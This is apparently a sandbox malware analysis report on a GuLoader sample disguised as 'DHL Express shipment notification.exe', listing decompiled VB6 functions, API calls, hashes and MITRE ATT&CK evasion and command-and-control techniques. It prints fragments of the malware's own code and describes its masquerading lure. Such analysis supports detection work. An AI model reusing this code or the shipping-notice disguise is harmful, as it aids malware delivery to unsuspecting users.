					_t43 =  *((intOrPtr*)( *_v48 + 0x138))(_v48, L"Printermanualen", 1);
					asm("fclex");
					_v52 = _t43;
					if(_v52 >= 0) {
						_v68 = _v68 & 0x00000000;
					} else {
						_push(0x138);
						_push(0x4025ac);
						_push(_v48);
						_push(_v52);
						L004017C8();
						_v68 = _t43;
					}
					L004017C2();
				}
				_v24 = 0x5a4c00;
				_push(0x420749);
				L00401846();
				return _t43;
			}

0x004205fe
0x00420609
0x0042060a
0x00420613
0x00420614
0x0042061c
0x0042061f
0x00420626
0x00420630
0x00420635
0x00420636
0x0042063b
0x00420642
0x00420647
0x0042064e
0x00420653
0x00420659
0x0042065f
0x00420661
0x0042066b
0x00420677
0x00420691
0x00420679
0x00420679
0x0042067e
0x00420683
0x00420688
0x00420688
0x0042069d
0x004206ac
0x004206af
0x004206b1
0x004206b8
0x004206d1
0x004206ba
0x004206ba
0x004206bc
0x004206c1
0x004206c4
0x004206c7
0x004206cc
0x004206cc
0x004206d8
0x004206ea
0x004206f0
0x004206f2
0x004206f9
0x00420715
0x004206fb
0x004206fb
0x00420700
0x00420705
0x00420708
0x0042070b
0x00420710
0x00420710
0x0042071c
0x0042071c
0x00420721
0x00420728
0x00420743
0x00420748

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00420614
#669.MSVBVM60(?,?,?,?,00401546), ref: 00420626
__vbaStrMove.MSVBVM60(?,?,?,?,00401546), ref: 00420630
__vbaStrCmp.MSVBVM60(Skimmia,00000000,?,?,?,?,00401546), ref: 0042063B
__vbaFreeStr.MSVBVM60(Skimmia,00000000,?,?,?,?,00401546), ref: 0042064E
#537.MSVBVM60(00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 00420661
__vbaStrMove.MSVBVM60(00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042066B
__vbaNew2.MSVBVM60(0040259C,004223C0,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 00420683
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 004206C7
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,00000138,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042070B
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042071C
__vbaFreeStr.MSVBVM60(00420749,Skimmia,00000000,?,?,?,?,00401546), ref: 00420743

Strings

Printermanualen, xrefs: 004206DD
Skimmia, xrefs: 00420636

Memory Dump Source

Source File: 00000000.00000002.777812019.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.777801767.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.777922397.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.777938364.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$#537#669ChkstkNew2
String ID: Printermanualen$Skimmia
API String ID: 2004920347-2169568590
Opcode ID: 2a274269b54266e1b28992246bd8cf0d3dca2d2ed5c021b36e10c649589bf6f7
Instruction ID: 1f5f0a3d536043ef6f84feea4e576f2d8cc4428acd2aad8097f42b1f72b7d2c8
Opcode Fuzzy Hash: 2a274269b54266e1b28992246bd8cf0d3dca2d2ed5c021b36e10c649589bf6f7
Instruction Fuzzy Hash: 95310871A50218AFCB00EFA5D986BEDBBF4BF48704F60442AF401B71E1DBB85951CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041F0BC, Relevance: 22.6, APIs: 15, Instructions: 81COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F0D8
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F102
__vbaVarDup.MSVBVM60 ref: 0041F129
#607.MSVBVM60(?,000000BB,?), ref: 0041F13B
__vbaStrVarMove.MSVBVM60(?,?,000000BB,?), ref: 0041F144
__vbaStrMove.MSVBVM60(?,?,000000BB,?), ref: 0041F14E
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,000000BB,?), ref: 0041F15D
#717.MSVBVM60(?,00006011,00000040,00000000), ref: 0041F17E
__vbaStrVarMove.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041F187
__vbaStrMove.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041F191
__vbaFreeVar.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041F199
__vbaFreeStr.MSVBVM60(0041F1DC,?,?,?,?,00401546), ref: 0041F1BB
__vbaAryDestruct.MSVBVM60(00000000,?,0041F1DC,?,?,?,?,00401546), ref: 0041F1C6
__vbaFreeStr.MSVBVM60(00000000,?,0041F1DC,?,?,?,?,00401546), ref: 0041F1CE
__vbaFreeStr.MSVBVM60(00000000,?,0041F1DC,?,?,?,?,00401546), ref: 0041F1D6

Memory Dump Source

Source File: 00000000.00000002.777812019.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.777801767.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.777922397.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.777938364.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#607#717ChkstkCopyDestructList
String ID:
API String ID: 1752509113-0
Opcode ID: fd34a71ea108f04a8a8a388cdd11b4521b4fe85834e561fb94705d0c49acf0fb
Instruction ID: b68adc669c6a93ad871fdc12cec82a4f0000957795de364914c73f38f209ce4d
Opcode Fuzzy Hash: fd34a71ea108f04a8a8a388cdd11b4521b4fe85834e561fb94705d0c49acf0fb
Instruction Fuzzy Hash: 6E31DC72900149ABDB00FBD1C986BDEB7B9AF04708F50843AB501B71E1EB786B09CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041FEE9, Relevance: 16.5, APIs: 11, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041FEE9(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v36;
				char _v52;
				char* _t24;
				void* _t38;
				void* _t40;
				intOrPtr _t41;

				_t41 = _t40 - 0xc;
				 *[fs:0x0] = _t41;
				L00401540();
				_v16 = _t41;
				_v12 = 0x4013c0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x24,  *[fs:0x0], 0x401546, _t38);
				L004017B6();
				L004017B6();
				_push( &_v52);
				L00401636();
				_t24 =  &_v52;
				_push(_t24);
				L00401834();
				L0040183A();
				L00401828();
				L00401630();
				_push(0x41ff91);
				L00401846();
				L00401846();
				L00401846();
				return _t24;
			}

0x0041feec
0x0041fefb
0x0041ff05
0x0041ff0d
0x0041ff10
0x0041ff17
0x0041ff26
0x0041ff2f
0x0041ff3a
0x0041ff42
0x0041ff43
0x0041ff48
0x0041ff4b
0x0041ff4c
0x0041ff56
0x0041ff5e
0x0041ff63
0x0041ff68
0x0041ff7b
0x0041ff83
0x0041ff8b
0x0041ff90

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041FF05
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041FF2F
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041FF3A
#612.MSVBVM60(?,?,?,?,?,00401546), ref: 0041FF43
__vbaStrVarMove.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FF4C
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FF56
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FF5E
#554.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FF63
__vbaFreeStr.MSVBVM60(0041FF91,?,?,?,?,?,?,00401546), ref: 0041FF7B
__vbaFreeStr.MSVBVM60(0041FF91,?,?,?,?,?,?,00401546), ref: 0041FF83
__vbaFreeStr.MSVBVM60(0041FF91,?,?,?,?,?,?,00401546), ref: 0041FF8B

Memory Dump Source

Source File: 00000000.00000002.777812019.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.777801767.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.777922397.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.777938364.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CopyMove$#554#612Chkstk
String ID:
API String ID: 3453574145-0
Opcode ID: 1a4b8d5b6b5250ccad47a608e351ad77b3903580ae7d1bfea7bee8f21abe1dc1
Instruction ID: d2cc51361f4f27c508c3ed615b46d83e740902005361d3b9217bebafc60b9dac
Opcode Fuzzy Hash: 1a4b8d5b6b5250ccad47a608e351ad77b3903580ae7d1bfea7bee8f21abe1dc1
Instruction Fuzzy Hash: 4E11FA31900149ABCB00FFA2C886EDEB774BF05708F50853AB501771E1EB3CAA06CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00421347, Relevance: 13.6, APIs: 9, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00421347(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				short _v36;
				char _v52;
				char _v68;
				char* _t29;
				void* _t39;
				void* _t41;
				intOrPtr _t42;

				_t42 = _t41 - 0xc;
				 *[fs:0x0] = _t42;
				L00401540();
				_v16 = _t42;
				_v12 = 0x4014d0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x401546, _t39);
				L004017B6();
				_push(0x5745);
				_push( &_v52);
				L0040167E();
				_push( &_v52);
				_push( &_v68);
				L004015E2();
				_push( &_v68);
				L00401834();
				L0040183A();
				_push( &_v68);
				_t29 =  &_v52;
				_push(_t29);
				_push(2);
				L00401840();
				_v36 = 0x253;
				_push(0x421403);
				L00401846();
				L00401846();
				return _t29;
			}

0x0042134a
0x00421359
0x00421363
0x0042136b
0x0042136e
0x00421375
0x00421384
0x0042138d
0x00421392
0x0042139a
0x0042139b
0x004213a3
0x004213a7
0x004213a8
0x004213b0
0x004213b1
0x004213bb
0x004213c3
0x004213c4
0x004213c7
0x004213c8
0x004213ca
0x004213d2
0x004213d8
0x004213f5
0x004213fd
0x00421402

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00421363
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0042138D
#698.MSVBVM60(?,00005745,?,?,?,?,00401546), ref: 0042139B
#520.MSVBVM60(?,?,?,00005745,?,?,?,?,00401546), ref: 004213A8
__vbaStrVarMove.MSVBVM60(?,?,?,?,00005745,?,?,?,?,00401546), ref: 004213B1
__vbaStrMove.MSVBVM60(?,?,?,?,00005745,?,?,?,?,00401546), ref: 004213BB
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,00005745,?,?,?,?,00401546), ref: 004213CA
__vbaFreeStr.MSVBVM60(00421403), ref: 004213F5
__vbaFreeStr.MSVBVM60(00421403), ref: 004213FD

Memory Dump Source

Source File: 00000000.00000002.777812019.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.777801767.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.777922397.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.777938364.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#520#698ChkstkCopyList
String ID:
API String ID: 415313431-0
Opcode ID: 8f7edf635c664b4903e7fe1205321c19f2f759a03192128100c750ad3c64068d
Instruction ID: acf9ba7a7808b8ee63fb7510f00659877307760c796ccb4f7fcb451105fc7c9b
Opcode Fuzzy Hash: 8f7edf635c664b4903e7fe1205321c19f2f759a03192128100c750ad3c64068d
Instruction Fuzzy Hash: 9F11EF72D00218ABCB00FF91DD86EEEB7BCBF44748F54842AF501A71A1EB789605CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041F821, Relevance: 13.6, APIs: 9, Instructions: 50COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F83D
#707.MSVBVM60(0000000C,00000000,?,?,?,?,00401546), ref: 0041F865
__vbaStrMove.MSVBVM60(0000000C,00000000,?,?,?,?,00401546), ref: 0041F86F
#593.MSVBVM60(0000000A), ref: 0041F88C
__vbaFreeVar.MSVBVM60(0000000A), ref: 0041F897
#537.MSVBVM60(0000003B,0000000A), ref: 0041F89E
__vbaStrMove.MSVBVM60(0000003B,0000000A), ref: 0041F8A8
__vbaFreeStr.MSVBVM60(0041F8CF,0000000C,00000000,?,?,?,?,00401546), ref: 0041F8C1
__vbaFreeStr.MSVBVM60(0041F8CF,0000000C,00000000,?,?,?,?,00401546), ref: 0041F8C9

Memory Dump Source

Source File: 00000000.00000002.777812019.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.777801767.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.777922397.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.777938364.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#537#593#707Chkstk
String ID:
API String ID: 2467297632-0
Opcode ID: 4c3784d49d30fa517d435da006b196bbc390b1e36b6f1799cc3846fb075db024
Instruction ID: 04e9fa2f50b4b9f221986749ddd16bcfecf36a641596b32815d4a5c3b84344d6
Opcode Fuzzy Hash: 4c3784d49d30fa517d435da006b196bbc390b1e36b6f1799cc3846fb075db024
Instruction Fuzzy Hash: 7411FE71940209ABDB01FBA1CC56BDE7BB4AF04748F14843AF501BB1E1DB789645CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041F1FB, Relevance: 12.0, APIs: 8, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E0041F1FB(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				long long _v40;
				char _v48;
				signed char _t22;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t32 = _t31 - 0xc;
				 *[fs:0x0] = _t32;
				L00401540();
				_v16 = _t32;
				_v12 = 0x401358;
				_v8 = 0;
				_t22 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x30,  *[fs:0x0], 0x401546, _t29);
				L004017B6();
				asm("fabs");
				asm("fnstsw ax");
				if((_t22 & 0x0000000d) != 0) {
					return __imp____vbaFPException();
				}
				L00401666();
				_v40 = __fp0;
				_v48 = 5;
				__eax =  &_v48;
				_push(__eax);
				L0040166C();
				L0040183A();
				L00401828();
				asm("wait");
				_push(0x41f2a0);
				L00401846();
				L00401846();
				return __eax;
			}

0x0041f1fe
0x0041f20d
0x0041f217
0x0041f21f
0x0041f222
0x0041f229
0x0041f238
0x0041f241
0x0041f24c
0x0041f24e
0x0041f252
0x0040154c
0x0040154c
0x0041f254
0x0041f259
0x0041f25c
0x0041f263
0x0041f266
0x0041f267
0x0041f271
0x0041f279
0x0041f27e
0x0041f27f
0x0041f292
0x0041f29a
0x0041f29f

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F217
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F241
__vbaFPFix.MSVBVM60(?,?,?,?,00401546), ref: 0041F254
#536.MSVBVM60(00000005), ref: 0041F267
__vbaStrMove.MSVBVM60(00000005), ref: 0041F271
__vbaFreeVar.MSVBVM60(00000005), ref: 0041F279
__vbaFreeStr.MSVBVM60(0041F2A0,00000005), ref: 0041F292
__vbaFreeStr.MSVBVM60(0041F2A0,00000005), ref: 0041F29A

Memory Dump Source

Source File: 00000000.00000002.777812019.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.777801767.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.777922397.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.777938364.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#536ChkstkCopyMove
String ID:
API String ID: 983360083-0
Opcode ID: 392090959a8b571694f60aab22cf4d63e7c94f7ff6f91e36fb8e713515f0db2a
Instruction ID: 69f99529d19ca589f3af9cb6ca5ca592279d261b525a69df8d7a3d959fa8e6d6
Opcode Fuzzy Hash: 392090959a8b571694f60aab22cf4d63e7c94f7ff6f91e36fb8e713515f0db2a
Instruction Fuzzy Hash: F8113C35800209ABCB00FFA5C846BEE7BB4AF05748F50806AF401771E1DB3D9A458B59

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report DHL Express shipment notification.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Analysis Process: DHL Express shipment notification.exe PID: 6368 Parent PID: 1972

General

Chronological Activities

Disassembly

Code Analysis

Analysis Process: DHL Express shipment notification.exe PID: 6368 Parent PID: 1972 DHL Express shipment notification.exeCOMMON

Executed Functions

Function 0041C6C4, Relevance: 375.8, APIs: 174, Strings: 40, Instructions: 1267
COMMON

Function 0041FFB0, Relevance: 124.7, APIs: 62, Strings: 9, Instructions: 416
COMMON

Function 0041DD7C, Relevance: 71.9, APIs: 33, Strings: 8, Instructions: 184
COMMON

Function 00420764, Relevance: 56.3, APIs: 31, Strings: 1, Instructions: 307
COMMON

Function 0041EB4D, Relevance: 40.3, APIs: 18, Strings: 5, Instructions: 85
COMMON

Function 0042142C, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 58
COMMON

Function 00421516, Relevance: 15.1, APIs: 10, Instructions: 102
COMMON

Function 00401888, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 160
COMMON

Function 00420F4D, Relevance: 82.5, APIs: 38, Strings: 9, Instructions: 225
COMMON

Function 0041F8EE, Relevance: 68.4, APIs: 32, Strings: 7, Instructions: 196
COMMON

Function 0041FC50, Relevance: 57.9, APIs: 29, Strings: 4, Instructions: 159
COMMON

Function 0041EE1A, Relevance: 56.2, APIs: 29, Strings: 3, Instructions: 179
COMMON

Function 0041F2C4, Relevance: 54.5, APIs: 29, Strings: 2, Instructions: 204
COMMON

Function 0041F5FE, Relevance: 50.9, APIs: 24, Strings: 5, Instructions: 130
COMMON

Function 0041EC89, Relevance: 38.6, APIs: 18, Strings: 4, Instructions: 95
COMMON

Function 00420C47, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 165
COMMON

Function 004205F9, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 95
COMMON

Function 0041FEE9, Relevance: 16.5, APIs: 11, Instructions: 47
COMMON

Function 00421347, Relevance: 13.6, APIs: 9, Instructions: 53
COMMON

Function 0041F1FB, Relevance: 12.0, APIs: 8, Instructions: 48
COMMON